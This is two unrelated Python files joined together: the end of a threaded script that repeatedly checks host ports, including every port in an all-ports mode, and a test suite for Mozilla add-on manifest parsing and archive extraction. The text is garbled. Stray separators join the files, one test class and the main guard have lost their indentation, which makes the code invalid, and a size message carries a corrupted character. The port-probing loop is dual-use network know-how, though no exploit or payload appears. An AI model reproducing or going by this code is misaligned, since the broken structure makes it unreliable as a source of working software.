      effectively ignored. The flag is now read directly from `args`.
    - the loop variable no longer shadows the module-level `thread` count
      (which previously made the executor branch raise UnboundLocalError
      had it ever been reached).
    - all-ports mode now covers the full port space (range(65536), i.e.
      0-65535; the original range(65353) silently skipped the top ports).
    """
    host_list = []
    for ip in hosts:
        if allport:
            for i in range(65536):
                host_list.append(
                    {
                        "ip": ip,
                        "port": i,
                        "conntype": connection_type,
                        "status": "unknown",
                    }
                )
        else:
            for port in ports:
                if port > start and port < end:
                    host_list.append(
                        {
                            "ip": ip,
                            "port": port,
                            "conntype": connection_type,
                            "status": "unknown",
                        }
                    )
    # Read the intended flag, not the (shadowed) module-level `run` name.
    one_thread_per_host = args.run == 1
    while True:
        if one_thread_per_host:
            workers = [
                threading.Thread(target=parseHost, args=(host,))
                for host in host_list
            ]
            for worker in workers:
                worker.start()
            for worker in workers:
                worker.join()
        else:
            # Bounded pool sized by the --thread option.
            with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor:
                executor.map(parseHost, host_list)
        println("Waiting " + str(interval) + " minutes for next check.", 0, "yellow")
        try:
            time.sleep(interval * 60)
        except:
            # Deliberately bare: also catches KeyboardInterrupt to exit cleanly.
            break
if __name__ == "__main__":
run() |
test_utils.py | # -*- coding: utf-8 -*-
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import EntitiesForbidden, NotSupportedError
from waffle.testutils import override_switch
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
pytestmark = pytest.mark.django_db
def _touch(fname):
    """Create *fname* if missing and bump its access/modification times to now."""
    with open(fname, 'a'):
        pass
    os.utime(fname, None)
class AppVersionsMixin(object):
    """Test mixin creating the AppVersion rows the manifest parsers depend on."""

    @classmethod
    def setUpTestData(cls):
        cls.create_webext_default_versions()

    @classmethod
    def create_appversion(cls, name, version):
        # `name` is an application short name ('firefox' / 'android').
        return AppVersion.objects.create(application=amo.APPS[name].id,
                                         version=version)

    @classmethod
    def create_webext_default_versions(cls):
        # The default min/max versions referenced by the extractors must exist
        # in the database for parsing to succeed.
        cls.create_appversion('firefox', '36.0')  # Incompatible with webexts.
        cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
        cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
        cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
        cls.create_appversion(
            'android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
        cls.create_appversion(
            'android', amo.DEFAULT_WEBEXT_MAX_VERSION)
        cls.create_appversion(
            'firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
        cls.create_appversion(
            'android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
    """utils.Extractor.parse must pick the right extractor for each manifest file."""

    def test_no_manifest(self):
        fake_zip = utils.make_xpi({'dummy': 'dummy'})

        with self.assertRaises(utils.NoManifestFound) as exc:
            utils.Extractor.parse(fake_zip)
        assert isinstance(exc.exception, forms.ValidationError)
        assert exc.exception.message == (
            'No install.rdf or manifest.json found')

    @mock.patch('olympia.files.utils.ManifestJSONExtractor')
    @mock.patch('olympia.files.utils.RDFExtractor')
    def test_parse_install_rdf(self, rdf_extractor, manifest_json_extractor):
        fake_zip = utils.make_xpi({'install.rdf': ''})
        utils.Extractor.parse(fake_zip)
        assert rdf_extractor.called
        assert not manifest_json_extractor.called

    @mock.patch('olympia.files.utils.ManifestJSONExtractor')
    @mock.patch('olympia.files.utils.RDFExtractor')
    def test_ignore_package_json(self, rdf_extractor, manifest_json_extractor):
        # Previously we preferred `package.json` to `install.rdf` which
        # we don't anymore since
        # https://github.com/mozilla/addons-server/issues/2460
        fake_zip = utils.make_xpi({'install.rdf': '', 'package.json': ''})
        utils.Extractor.parse(fake_zip)
        assert rdf_extractor.called
        assert not manifest_json_extractor.called

    @mock.patch('olympia.files.utils.ManifestJSONExtractor')
    @mock.patch('olympia.files.utils.RDFExtractor')
    def test_parse_manifest_json(self, rdf_extractor, manifest_json_extractor):
        fake_zip = utils.make_xpi({'manifest.json': ''})
        utils.Extractor.parse(fake_zip)
        assert not rdf_extractor.called
        assert manifest_json_extractor.called

    @mock.patch('olympia.files.utils.ManifestJSONExtractor')
    @mock.patch('olympia.files.utils.RDFExtractor')
    def test_prefers_manifest_to_install_rdf(self, rdf_extractor,
                                             manifest_json_extractor):
        fake_zip = utils.make_xpi({'install.rdf': '', 'manifest.json': ''})
        utils.Extractor.parse(fake_zip)
        assert not rdf_extractor.called
        assert manifest_json_extractor.called

    @mock.patch('olympia.files.utils.os.path.getsize')
    def test_static_theme_max_size(self, getsize_mock):
        getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
        manifest = utils.ManifestJSONExtractor(
            '/fake_path', '{"theme": {}}').parse()

        # Calling to check it doesn't raise.
        assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())

        # Increase the size though and it should raise an error.
        getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1

        with pytest.raises(forms.ValidationError) as exc:
            utils.check_xpi_info(manifest, xpi_file=mock.Mock())
        assert (
            exc.value.message ==
            u'Maximum size for WebExtension themes is 7.0ย MB.')

        # Double-check only static themes are limited.
        manifest = utils.ManifestJSONExtractor(
            '/fake_path', '{}').parse()
        assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestRDFExtractor(TestCase):
    """RDFExtractor compatibility filtering for legacy (install.rdf) add-ons."""

    def setUp(self):
        self.firefox_versions = [
            AppVersion.objects.create(application=amo.APPS['firefox'].id,
                                      version='38.0a1'),
            AppVersion.objects.create(application=amo.APPS['firefox'].id,
                                      version='43.0'),
        ]
        # NOTE(review): despite the attribute name, these rows are created for
        # the 'android' application -- confirm whether the name is just stale.
        self.thunderbird_versions = [
            AppVersion.objects.create(application=amo.APPS['android'].id,
                                      version='42.0'),
            AppVersion.objects.create(application=amo.APPS['android'].id,
                                      version='45.0'),
        ]

    def test_apps_disallow_thunderbird_and_seamonkey(self):
        zip_file = utils.SafeZip(get_addon_file(
            'valid_firefox_and_thunderbird_addon.xpi'))
        extracted = utils.RDFExtractor(zip_file).parse()
        apps = extracted['apps']
        # Only the Firefox targeting survives extraction.
        assert len(apps) == 1
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == '38.0a1'
        assert apps[0].max.version == '43.0'
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
    """ManifestJSONExtractor: parsing WebExtension manifest.json metadata."""

    def parse(self, base_data):
        # Helper: parse a dict as if it were the manifest.json contents.
        return utils.ManifestJSONExtractor(
            '/fake_path', json.dumps(base_data)).parse()

    def test_instanciate_without_data(self):
        """Without data, we load the data from the file path."""
        data = {'id': 'some-id'}
        fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})

        extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
        assert extractor.data == data

    def test_guid_from_applications(self):
        """Use applications>gecko>id for the guid."""
        assert self.parse(
            {'applications': {
                'gecko': {
                    'id': 'some-id'}}})['guid'] == 'some-id'

    def test_guid_from_browser_specific_settings(self):
        """Use browser_specific_settings>gecko>id for the guid."""
        assert self.parse(
            {'browser_specific_settings': {
                'gecko': {
                    'id': 'some-id'}}})['guid'] == 'some-id'

    def test_name_for_guid_if_no_id(self):
        """Don't use the name for the guid if there is no id."""
        assert self.parse({'name': 'addon-name'})['guid'] is None

    def test_type(self):
        """manifest.json addons are always ADDON_EXTENSION."""
        assert self.parse({})['type'] == amo.ADDON_EXTENSION

    def test_is_restart_required(self):
        """manifest.json addons never requires restart."""
        assert self.parse({})['is_restart_required'] is False

    def test_name(self):
        """Use name for the name."""
        assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'

    def test_version(self):
        """Use version for the version."""
        assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'

    def test_homepage(self):
        """Use homepage_url for the homepage."""
        assert (
            self.parse({'homepage_url': 'http://my-addon.org'})['homepage'] ==
            'http://my-addon.org')

    def test_summary(self):
        """Use description for the summary."""
        assert (
            self.parse({'description': 'An addon.'})['summary'] == 'An addon.')

    def test_invalid_strict_min_version(self):
        # A non-numeric strict_min_version is rejected.
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': 'A',
                    'id': '@invalid_strict_min_version'
                }
            }
        }
        with pytest.raises(forms.ValidationError) as exc:
            self.parse(data)
        assert (
            exc.value.message ==
            'Lowest supported "strict_min_version" is 42.0.')

    def test_unknown_strict_min_version(self):
        # A version with no matching AppVersion row is rejected.
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '76.0',
                    'id': '@unknown_strict_min_version'
                }
            }
        }
        with pytest.raises(forms.ValidationError) as exc:
            self.parse(data)
        assert exc.value.message == (
            u'Unknown "strict_min_version" 76.0 for Firefox')

    def test_unknown_strict_max_version(self):
        # Unlike min, an unknown strict_max_version is ignored and the
        # defaults are used instead.
        data = {
            'applications': {
                'gecko': {
                    'strict_max_version': '76.0',
                    'id': '@unknown_strict_min_version'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        app = apps[0]
        assert app.appdata == amo.FIREFOX
        assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        app = apps[1]
        assert app.appdata == amo.ANDROID
        assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION

    def test_strict_min_version_needs_to_be_higher_then_42_if_specified(self):
        """strict_min_version needs to be higher than 42.0 if specified."""
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '36.0',
                    'id': '@too_old_strict_min_version'
                }
            }
        }
        with pytest.raises(forms.ValidationError) as exc:
            self.parse(data)
        assert (
            exc.value.message ==
            'Lowest supported "strict_min_version" is 42.0.')

    def test_apps_use_provided_versions(self):
        """Use the min and max versions if provided."""
        firefox_min_version = self.create_appversion('firefox', '47.0')
        firefox_max_version = self.create_appversion('firefox', '47.*')
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '>=47.0',
                    'strict_max_version': '=47.*',
                    'id': '@random'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        app = apps[0]
        assert app.appdata == amo.FIREFOX
        assert app.min == firefox_min_version
        assert app.max == firefox_max_version

        # We have no way of specifying a different version for Android when an
        # explicit version number is provided... That being said, we know that
        # 47.0 is too low for Android, so we silently cap it at 48.0. That
        # forces us to also change the max version for android.
        app = apps[1]
        assert app.appdata == amo.ANDROID
        assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
        assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID

    def test_apps_use_default_versions_if_none_provided(self):
        """Use the default min and max versions if none provided."""
        data = {'applications': {'gecko': {'id': 'some-id'}}}
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        app = apps[0]
        assert app.appdata == amo.FIREFOX
        assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        app = apps[1]
        assert app.appdata == amo.ANDROID
        assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION

        # But if 'browser_specific_settings' is used, it's higher min version.
        data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        app = apps[0]
        assert app.appdata == amo.FIREFOX
        assert app.min.version == (
            amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        app = apps[1]
        assert app.appdata == amo.ANDROID
        assert app.min.version == (
            amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION

    def test_is_webextension(self):
        assert self.parse({})['is_webextension']

    def test_allow_static_theme_waffle(self):
        manifest = utils.ManifestJSONExtractor(
            '/fake_path', '{"theme": {}}').parse()

        utils.check_xpi_info(manifest)

        assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME

    def test_extensions_dont_have_strict_compatibility(self):
        assert self.parse({})['strict_compatibility'] is False

    def test_moz_signed_extension_no_strict_compat(self):
        addon = amo.tests.addon_factory()
        user = amo.tests.user_factory(email='foo@mozilla.com')
        file_obj = addon.current_version.all_files[0]
        file_obj.update(is_mozilla_signed_extension=True)
        fixture = (
            'src/olympia/files/fixtures/files/'
            'legacy-addon-already-signed-0.1.0.xpi')

        with amo.tests.copy_file(fixture, file_obj.file_path):
            parsed = utils.parse_xpi(file_obj.file_path, user=user)
            assert parsed['is_mozilla_signed_extension']
            assert not parsed['strict_compatibility']

    def test_moz_signed_extension_reuse_strict_compat(self):
        addon = amo.tests.addon_factory()
        user = amo.tests.user_factory(email='foo@mozilla.com')
        file_obj = addon.current_version.all_files[0]
        file_obj.update(is_mozilla_signed_extension=True)
        fixture = (
            'src/olympia/files/fixtures/files/'
            'legacy-addon-already-signed-strict-compat-0.1.0.xpi')

        with amo.tests.copy_file(fixture, file_obj.file_path):
            parsed = utils.parse_xpi(file_obj.file_path, user=user)
            assert parsed['is_mozilla_signed_extension']
            # We set `strictCompatibility` in install.rdf
            assert parsed['strict_compatibility']

    @mock.patch('olympia.addons.models.resolve_i18n_message')
    def test_mozilla_trademark_disallowed(self, resolve_message):
        resolve_message.return_value = 'Notify Mozilla'

        addon = amo.tests.addon_factory()
        file_obj = addon.current_version.all_files[0]
        fixture = (
            'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')

        with amo.tests.copy_file(fixture, file_obj.file_path):
            with pytest.raises(forms.ValidationError) as exc:
                utils.parse_xpi(file_obj.file_path)
            assert dict(exc.value.messages)['en-us'].startswith(
                u'Add-on names cannot contain the Mozilla or'
            )

    @mock.patch('olympia.addons.models.resolve_i18n_message')
    @override_switch('content-optimization', active=False)
    def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
        # "for Mozilla" (as opposed to just "Mozilla") is acceptable.
        resolve_message.return_value = 'Notify for Mozilla'

        addon = amo.tests.addon_factory()
        file_obj = addon.current_version.all_files[0]
        fixture = (
            'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')

        with amo.tests.copy_file(fixture, file_obj.file_path):
            utils.parse_xpi(file_obj.file_path)

    def test_apps_use_default_versions_if_applications_is_omitted(self):
        """
        WebExtensions are allowed to omit `applications[/gecko]` and we
        previously skipped defaulting to any `AppVersion` once this is not
        defined. That resulted in none of our platforms being selectable.

        See https://github.com/mozilla/addons-server/issues/2586 and
        probably many others.
        """
        data = {}
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
        assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
        assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION

    def test_handle_utf_bom(self):
        # A UTF-8 BOM prefix must not break manifest parsing.
        manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
        parsed = utils.ManifestJSONExtractor(None, manifest).parse()
        assert parsed['name'] == '...'

    def test_raise_error_if_no_optional_id_support(self):
        """
        We only support optional ids in Firefox 48+ and will throw an error
        otherwise.
        """
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '42.0',
                    'strict_max_version': '49.0',
                }
            }
        }
        with pytest.raises(forms.ValidationError) as exc:
            self.parse(data)['apps']
        assert (
            exc.value.message ==
            'Add-on ID is required for Firefox 47 and below.')

    def test_comments_are_allowed(self):
        # manifest.json may contain //-style comments (Firefox tolerates them).
        json_string = """
        {
            // Required
            "manifest_version": 2,
            "name": "My Extension",
            "version": "versionString",

            // Recommended
            "default_locale": "en",
            "description": "A plain text description"
        }
        """
        manifest = utils.ManifestJSONExtractor(
            '/fake_path', json_string).parse()

        assert manifest['is_webextension'] is True
        assert manifest.get('name') == 'My Extension'

    def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
        # We shouldn't skip adding specific apps to the WebExtension
        # no matter any potential incompatibility, e.g
        # browser_specific_settings is only supported from Firefox 48.0
        # onwards, now if the user specifies strict_min_compat as 42.0
        # we shouldn't skip the app because of that. Instead we override the
        # value with the known min version that started supporting that.
        data = {
            'browser_specific_settings': {
                'gecko': {
                    'strict_min_version': '42.0',
                    'id': '@random'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == (
            amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min.version == (
            amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {
'applications': {
'gecko': {
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {
'gecko': {
'id': '@dict'
}
},
'dictionaries': {'en-US': '/path/to/en-US.dic'}
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {
'dictionaries': {}
}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
    def test_check_xpi_info_langpack_submission_restrictions(self):
        """Only users holding the LANGPACK_SUBMIT permission may submit
        langpacks; regular users get a ValidationError."""
        user = user_factory()
        self.create_appversion('firefox', '60.0')
        self.create_appversion('firefox', '60.*')
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '>=60.0',
                    'strict_max_version': '=60.*',
                    'id': '@langp'
                }
            },
            'langpack_id': 'foo'
        }
        parsed_data = utils.ManifestJSONExtractor(
            '/fake_path.xpi', json.dumps(data)).parse()
        with self.assertRaises(ValidationError):
            # Regular users aren't allowed to submit langpacks.
            utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
        # Shouldn't raise for users with proper permissions
        self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
        utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
    """Re-run the manifest extractor test suite with a `theme` key injected,
    so every manifest parses as a static theme."""
    def parse(self, base_data):
        # Inject an empty `theme` entry so the inherited tests exercise the
        # static-theme code path.
        if 'theme' not in base_data.keys():
            base_data.update(theme={})
        return super(
            TestManifestJSONExtractorStaticTheme, self).parse(base_data)
    def test_type(self):
        """Presence of `theme` makes the add-on a static theme."""
        assert self.parse({})['type'] == amo.ADDON_STATICTHEME
    def test_apps_use_default_versions_if_applications_is_omitted(self):
        """
        Override this because static themes have a higher default version.
        """
        data = {}
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
        assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
        assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
    def test_apps_use_default_versions_if_none_provided(self):
        """Use the default min and max versions if none provided."""
        data = {'applications': {'gecko': {'id': 'some-id'}}}
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
        assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
        assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
    def test_apps_use_provided_versions(self):
        """Use the min and max versions if provided."""
        firefox_min_version = self.create_appversion('firefox', '66.0')
        firefox_max_version = self.create_appversion('firefox', '66.*')
        android_min_version = self.create_appversion('android', '66.0')
        android_max_version = self.create_appversion('android', '66.*')
        data = {
            'applications': {
                'gecko': {
                    'strict_min_version': '>=66.0',
                    'strict_max_version': '=66.*',
                    'id': '@random'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min == firefox_min_version
        assert apps[0].max == firefox_max_version
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min == android_min_version
        assert apps[1].max == android_max_version
    def test_theme_json_extracted(self):
        # Check theme data is extracted from the manifest and returned.
        data = {'theme': {'colors': {'tab_background_text': "#3deb60"}}}
        assert self.parse(data)['theme'] == data['theme']
    def test_unknown_strict_max_version(self):
        """A strict_max_version with no matching AppVersion row falls back
        to the defaults instead of failing."""
        data = {
            'applications': {
                'gecko': {
                    'strict_max_version': '76.0',
                    'id': '@unknown_strict_min_version'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        app = apps[0]
        assert app.appdata == amo.FIREFOX
        assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        app = apps[1]
        assert app.appdata == amo.ANDROID
        assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID
        assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
    def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
        # In the parent class this method would bump the min_version to 48.0
        # because that's the first version to support
        # browser_specific_settings, but in static themes we bump it even
        # higher because of the minimum version when we started supporting
        # static themes themselves.
        data = {
            'browser_specific_settings': {
                'gecko': {
                    'strict_min_version': '42.0',
                    'id': '@random'
                }
            }
        }
        apps = self.parse(data)['apps']
        assert len(apps) == 2
        assert apps[0].appdata == amo.FIREFOX
        assert apps[0].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
        assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        assert apps[1].appdata == amo.ANDROID
        assert apps[1].min.version == (
            amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
        assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize('filename, expected_files', [
    ('webextension_no_id.xpi', [
        'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
        'popup'
    ]),
    ('webextension_no_id.zip', [
        'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
        'popup'
    ]),
    ('webextension_no_id.tar.gz', [
        'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
        'popup'
    ]),
    ('webextension_no_id.tar.bz2', [
        'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
        'popup'
    ]),
    ('search.xml', [
        'search.xml',
    ])
])
def test_extract_extension_to_dest(filename, expected_files):
    """extract_extension_to_dest unpacks xpi/zip/tar.gz/tar.bz2 archives and
    copies non-archive files (search.xml) into the destination as-is."""
    extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
        fname=filename)
    with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
        temp_folder = utils.extract_extension_to_dest(extension_file)
        assert sorted(os.listdir(temp_folder)) == expected_files
        # fsync isn't called by default
        assert not fsync_mock.called
@pytest.mark.parametrize('filename', [
    'webextension_no_id.xpi', 'webextension_no_id.zip',
    'webextension_no_id.tar.bz2', 'webextension_no_id.tar.gz', 'search.xml',
])
def test_extract_extension_to_dest_call_fsync(filename):
    """With force_fsync=True, extraction fsyncs the extracted files."""
    extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
        fname=filename)
    with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
        utils.extract_extension_to_dest(extension_file, force_fsync=True)
        # fsync IS called when force_fsync=True. (The previous "fsync isn't
        # called by default" comment was copy/pasted from the test above.)
        assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
    """A missing source archive raises FileNotFoundError and still cleans up
    the temporary extraction directory."""
    extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
    with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
        with pytest.raises(FileNotFoundError):
            utils.extract_extension_to_dest(extension_file)
    # Make sure we are cleaning up our temporary directory if possible
    assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
    """A corrupt archive raises ValidationError and still cleans up the
    temporary extraction directory."""
    extension_file = (
        'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
    )
    with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
        with pytest.raises(forms.ValidationError):
            utils.extract_extension_to_dest(extension_file)
    # Make sure we are cleaning up our temporary directory if possible
    assert mock_rmtree.called
@pytest.fixture
def file_obj():
    """Return the File object of a freshly created add-on (guid 'xxxxx')."""
    addon = amo.tests.addon_factory()
    addon.update(guid='xxxxx')
    version = addon.current_version
    return version.all_files[0]
@pytestmark
def test_bump_version_in_manifest_json(file_obj):
    """update_version_number rewrites the version inside manifest.json so the
    re-parsed xpi reports the new version string."""
    AppVersion.objects.create(application=amo.FIREFOX.id,
                              version=amo.DEFAULT_WEBEXT_MIN_VERSION)
    AppVersion.objects.create(application=amo.FIREFOX.id,
                              version=amo.DEFAULT_WEBEXT_MAX_VERSION)
    AppVersion.objects.create(application=amo.ANDROID.id,
                              version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
    AppVersion.objects.create(application=amo.ANDROID.id,
                              version=amo.DEFAULT_WEBEXT_MAX_VERSION)
    with amo.tests.copy_file(
            'src/olympia/files/fixtures/files/webextension.xpi',
            file_obj.file_path):
        utils.update_version_number(file_obj, '0.0.1.1-signed')
        parsed = utils.parse_xpi(file_obj.file_path)
        assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
    """extract_translations returns one entry per _locales/<lang> folder."""
    extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
    with amo.tests.copy_file(extension, file_obj.file_path):
        messages = utils.extract_translations(file_obj)
        assert list(sorted(messages.keys())) == [
            'de', 'en-US', 'ja', 'nb-NO', 'nl', 'ru', 'sv-SE']
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
    """extract_translations swallows KeyError/IOError (missing/broken files)
    and ValueError (invalid JSON) but propagates any other exception."""
    extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
    with amo.tests.copy_file(extension, file_obj.file_path):
        read_mock.side_effect = KeyError
        # Does not raise an exception
        utils.extract_translations(file_obj)
        read_mock.side_effect = IOError
        # Does not raise an exception too
        utils.extract_translations(file_obj)
        # We don't fail on invalid JSON too, this is addons-linter domain
        read_mock.side_effect = ValueError
        utils.extract_translations(file_obj)
        # But everything else...
        read_mock.side_effect = TypeError
        with pytest.raises(TypeError):
            utils.extract_translations(file_obj)
def test_get_all_files():
    """get_all_files walks the tree recursively and returns sorted paths."""
    base = tempfile.mkdtemp(dir=settings.TMP_PATH)
    os.mkdir(os.path.join(base, 'dir1'))
    _touch(os.path.join(base, 'foo1'))
    _touch(os.path.join(base, 'dir1', 'foo2'))
    expected = [
        os.path.join(base, 'dir1'),
        os.path.join(base, 'dir1', 'foo2'),
        os.path.join(base, 'foo1'),
    ]
    assert utils.get_all_files(base) == expected
    shutil.rmtree(base)
    assert not os.path.exists(base)
